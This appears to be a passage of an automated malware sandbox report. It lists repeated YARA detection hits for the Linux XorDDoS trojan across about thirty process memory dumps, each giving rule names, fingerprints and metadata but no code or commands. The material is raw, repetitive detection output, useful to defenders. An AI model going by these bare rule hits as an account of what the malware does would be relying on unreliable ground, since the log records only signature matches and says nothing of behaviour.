            Source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
